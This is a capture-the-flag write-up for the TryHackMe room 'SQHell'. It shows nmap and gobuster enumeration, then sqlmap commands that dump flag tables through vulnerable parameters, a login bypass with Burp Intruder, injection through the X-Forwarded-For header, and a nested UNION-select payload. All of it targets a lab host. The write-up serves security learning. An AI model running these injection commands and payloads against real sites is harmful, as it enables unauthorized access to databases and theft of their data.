SQHell — TryHackMe
Let’s Start Enumeration, using Nmap to see open ports and services.
sudo nmap -A <target-ip>
There are two open ports 22 and 80,lets look for hidden directories using Gobuster.
sudo gobuster dir -u http://<target-ip>/ -w /usr/share/wordlists/dirb/common.txt — wildcard php,html
Nothing much to further enumerate, in the website under post directory id parameter seems to vulnerable to sql injection, using sqlmap to find vulnerablities.
sudo sqlmap -u “http://<target_ip>/post/?id=2” -dbs
After this we came to know about the database “sqhell_5”,now intercept the request using burpsuite and save to a file.Now let’s dump the data present in that database and we already know the table name given in hint ‘flag’.
sudo sqlmap -r req — dbms=’MySQL’ -D sqhell_5 -T flag — dump — threads 10
After running this we are able to extract the flag5, but not other flag’s though let’s try to find out others.
Heading onto login panel, tried with default credentials,not got passed though,let’s try sql injection on the username.Intercept the request and send to intruder, load the payload, i used this github ,configure the position of payload to username only.
Tick mark the url encode characters.After running intruder we were able to get-in admin panel.
Send the request and get the flag1 appears on the response.
Now looking into register panel, anything we try to do it kept on alerting registrations are no longer available, intercepting the request we see username parameter in the request.The ?user-check seems to be vulnerable to sql injection, again running sqlmap we came to know about the database ‘sqhell_3’,save the request to a file, lets extract the flag now.
sudo sqlmap -r register — dbms=’MySQL’ -D sqhell_3 -T flag — dump
We got the flag3 still we need to find flag2 and 4, in the hint given for flag2 under terms-and-condition iii: We log your IP address for analytics purposes this seems to be of our use ,the site logs the IP addresses of the user connecting to their website using HTTP-header called X-forwarded-for,let’s exploit this.After running sqlmap we came to know about sqhell_1 database.
sudo sqlmap — dbms mysql — headers=”X-forwarded-for:1*” -u http://<target_ip>/ -D sqhell_1 -T flag — dump
Well we got flag2 now we are left with flag4.We have looked into all directories except users/?id let’s try to find if we have flag here! id parameter at first seemed to be vulnerable after using sqlmap , was unable to get flag.The hint says Well, dreams, they feel real while we’re in them right? this is from inception movie.Modified the request,and we were able to change the database.
http://<target_ip>/user?id=2 union all select 1,4,5 from users#
Now we need to fetch the flag using this,
http://<target_ip>/user?id=2 union all select “1 union select 1,flag,4,5 from flag — -”,1,2 from users#
Successfully retrieved flag4!! and completed the challenge.
Thank You!!
Happy Hacking!! 👻
